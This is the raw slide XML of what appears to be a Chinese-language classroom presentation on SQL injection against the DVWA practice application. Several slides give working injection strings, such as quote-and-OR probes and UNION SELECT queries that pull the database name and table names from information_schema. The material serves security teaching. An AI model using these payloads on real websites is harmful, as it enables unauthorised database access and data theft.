              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44041" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1708150" y="44450"/>
            <a:ext cx="1605280" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>分析源码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="直接连接符 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2520315" y="1958340"/>
            <a:ext cx="1870075" cy="16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6083"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6084"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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46086" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1647190" y="3178175"/>
            <a:ext cx="9145588" cy="2676525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 页面正常 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 页面返回错误:报错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...use near ''1''' at line 1...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>页面正常</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>' or '1'='2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>页面返回为空，查询失败 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1' or '1'='1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 页面正常，并返回更多信息，成功查询</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1337628" y="1184275"/>
            <a:ext cx="3581400" cy="1771650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303838" y="1222375"/>
            <a:ext cx="3609975" cy="1695450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7008813" y="2292350"/>
            <a:ext cx="3667125" cy="3952875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46090" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="376238"/>
            <a:ext cx="3881120" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1.判断是否存在注入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6086"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="46086"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4608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7107"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7108"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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="459740"/>
            <a:ext cx="10939780" cy="1383665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>猜数据库名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1' union select 1,database()#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT first_name,last_name FROM users WHERE user_id = </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1' union select 1,database()#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47111" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="1843088"/>
            <a:ext cx="7800975" cy="4640262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6673850" y="5721350"/>
            <a:ext cx="3098800" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>得数据库名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2403475" y="126365"/>
            <a:ext cx="3500755" cy="180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8131"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8132"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48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48134" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000760" y="0"/>
            <a:ext cx="9793605" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>猜表名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1' union select 1,group_concat(table_name) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>from information_schema.tables </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>where table_schema =database()#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SELECT first_name,last_name FROM users WHERE user_id ='</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1' union select 1,group_concat(table_name) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>from information_schema.tables </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>where table_schema =database()#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
